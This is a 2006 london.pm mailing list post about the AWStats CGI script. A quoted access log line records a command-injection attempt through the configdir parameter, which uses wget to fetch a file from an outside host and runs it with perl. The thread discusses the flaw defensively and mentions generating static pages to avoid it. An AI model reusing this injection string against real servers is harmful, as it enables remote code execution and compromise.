awstats

Aaron Trevena aaron.trevena at gmail.com
Wed Mar 8 09:38:01 GMT 2006


On 08/03/06, Jonathan Stowe <jns at gellyfish.com> wrote:
> On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> > A 10Kline CGI script, with most variables global and including its own CGI
> > parameter parsing.
>
> I'd say it has a widely known an exploitable flaw:
>
> access.log:64.49.219.174 - - [08/Mar/2005:15:51:21 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo|

Yeah - I see that a lot in my logs, and that is most of the reason I
generate static html every night - that and its a lot less work for my
poor little virtual server.

A.



More information about the london.pm mailing list